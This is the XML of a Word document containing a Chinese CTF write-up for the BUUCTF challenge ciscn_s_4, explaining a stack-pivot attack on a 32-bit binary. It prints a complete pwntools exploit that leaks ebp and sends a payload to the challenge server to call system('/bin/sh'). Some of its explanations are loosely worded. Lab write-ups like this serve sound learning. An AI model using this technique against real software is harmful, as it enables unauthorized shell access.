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42C7D" w14:textId="50AE70AC" w:rsidR="006017DD" w:rsidRDefault="005A06BF" w:rsidP="005A06B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看一下主函数</w:t>
      </w:r>
      <w:r w:rsidRPr="005A06BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DBF66A" wp14:editId="7075A305">
            <wp:extent cx="5274310" cy="1708150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="741272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72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3662" w14:textId="66D1B637" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06B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这道题我原本以为是一个简单的栈溢出因为他的payload正好够</w:t>
      </w:r>
      <w:r w:rsidRPr="005A06BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C87FCB2" wp14:editId="186E968F">
            <wp:extent cx="5274310" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="78434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4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但echo flag的意思是将flag这个字符串打印到终端并不是拿到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E13DE" w14:textId="695E3B6C" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06B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看一下正确脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9125E4" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67657B" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context.log_level="debug"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD0EBB" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p=remote("node5.buuoj.cn",29452)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AD6E6" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#p=process("./ciscn_s_4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B333E3" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA4888" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload=b'a'*0x24+b'bbbb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D64AB" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.recvuntil("Welcome, my friend. What's your name?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABD719" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067D843" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE057AF" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.recvuntil("bbbb")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90AA24" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp=u32(p.recv(4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC118E" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(hex(ebp))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A2C56" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf=ebp-0x38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3981D" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06B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sys=0x8048400 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F6535" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leave=0x8048593</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA5F78" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload=(b'aaaa'+p32(sys)+p32(0)+p32(buf+16)+b'/bin/sh\0').ljust(0x28,b'a')+p32(buf)+p32(leave)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D67CB" w14:textId="77777777" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1799AA44" w14:textId="2B23BF1F" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F2F6F" w14:textId="34781957" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里看着脚本很短其实里面的知识点很多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48A6F9" w14:textId="13F37480" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF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>第一为什么我疑惑的点是为什么s的开头到ebp的距离ida上面写的0x28但是，后面又变成了0x38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495DF5A2" w14:textId="7178F89D" w:rsidR="005A06BF" w:rsidRDefault="005A06BF" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里解释一下0x28是物理地址他是不变的就是跟堆砌一样，0x38是什么，他是类似于格式化字符串的知识点，它相对于物理地址他的输出是有偏移的，我们要栈迁移的位置要求就是稳定可控空间大，所以我们用输入的开头这样位置最大，要是有bss段优先用，但是这个文件里没有bss段</w:t>
      </w:r>
      <w:r w:rsidR="004A10D6" w:rsidRPr="004A10D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504EFFFF" wp14:editId="388868CE">
            <wp:extent cx="5274310" cy="1863090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="13343879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879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0D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给printf打断点</w:t>
      </w:r>
      <w:r w:rsidR="004A10D6" w:rsidRPr="004A10D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDFF740" wp14:editId="12CFE478">
            <wp:extent cx="5274310" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1008121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21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0D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看栈内情况就能看到输入的三个a里ebp的距离是0x38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5483D7" w14:textId="77777777" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E16AB58" w14:textId="6A1E58FD" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个疑惑的点是最后那个payload在干啥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9FD10" w14:textId="08D00B48" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A10D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload=(b'aaaa'+p32(sys)+p32(0)+p32(buf+16)+b'/bin/sh\0').ljust(0x28,b'a')+p32(buf)+p32(leave)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B37B8C" w14:textId="0DA9246F" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿下来看首先我们要知道leave命令是mov ebp；esp  pop ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584E720" w14:textId="440545FD" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们只需要记住pop，esp会加，push，esp会减</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F389D8C" w14:textId="5EC8D9D7" w:rsidR="004A10D6" w:rsidRDefault="004A10D6" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以那aaaa就是占位符，第二个是调用system，第三个是去s的物理地址稳定能写入，写入system的参数bin/sh，这里要提醒</w:t>
      </w:r>
      <w:r w:rsidRPr="004A10D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在bss段里写bin/sh和</w:t>
      </w:r>
      <w:r w:rsidRPr="004A10D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>system("/bin/sh")不在bss段上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本质</w:t>
      </w:r>
      <w:r w:rsidRPr="004A10D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以也可以得到提权，将整体打包成0x28，第三个是覆盖ebp的值也就是ebp-0x38的地方，最后就是leave了让ebp和esp过去完成攻击</w:t>
      </w:r>
      <w:r w:rsidR="00F22A16" w:rsidRPr="00F22A16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE8D981" wp14:editId="7748B4EA">
            <wp:extent cx="5274310" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1929883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832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2A16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘它相当于执行了两次leave</w:t>
      </w:r>
      <w:r w:rsidR="00D35C75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DE78E" w14:textId="0F482B36" w:rsidR="00F22A16" w:rsidRDefault="00F22A16" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一次是正常函数结束然后执行了leave，也就是把ebp覆盖成buf的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6503628F" w14:textId="0C7BD605" w:rsidR="00F22A16" w:rsidRDefault="00F22A16" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二次就是把整个攻击脚本移到buf的位置了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CD07B" w14:textId="17738979" w:rsidR="00F22A16" w:rsidRPr="00F22A16" w:rsidRDefault="00F22A16" w:rsidP="005A06BF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而且栈迁移的攻击讲究的是打包好的攻击，跳转过去直接能用，所以先构造，再跳转</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F22A16" w:rsidRPr="00F22A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EAE1F" w14:textId="77777777" w:rsidR="00430527" w:rsidRDefault="00430527" w:rsidP="005A06B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213C7E5" w14:textId="77777777" w:rsidR="00430527" w:rsidRDefault="00430527" w:rsidP="005A06B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0D680" w14:textId="77777777" w:rsidR="00430527" w:rsidRDefault="00430527" w:rsidP="005A06B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127798E" w14:textId="77777777" w:rsidR="00430527" w:rsidRDefault="00430527" w:rsidP="005A06B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FB186C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="810400DE"/>
    <w:lvl w:ilvl="0" w:tplc="9AB4527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36374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7DD"/>
    <w:rsid w:val="00093B0A"/>
    <w:rsid w:val="00430527"/>
    <w:rsid w:val="004A10D6"/>
    <w:rsid w:val="005A06BF"/>
    <w:rsid w:val="006017DD"/>
    <w:rsid w:val="00B80E46"/>
    <w:rsid w:val="00D35C75"/>
    <w:rsid w:val="00DC0D79"/>
    <w:rsid w:val="00F22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E6CC49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{157B38E9-BA5E-4B99-87A8-C1528E3B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017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1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17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17D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17D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17D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17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17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17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17D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17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17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17D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17D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017D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17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17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17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17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1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17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17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1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17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17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17D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17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17D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017D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A06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A06B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A06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A06B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379</Words>
  <Characters>882</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>38</Lines>
  <Paragraphs>31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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-16T11:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T11:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>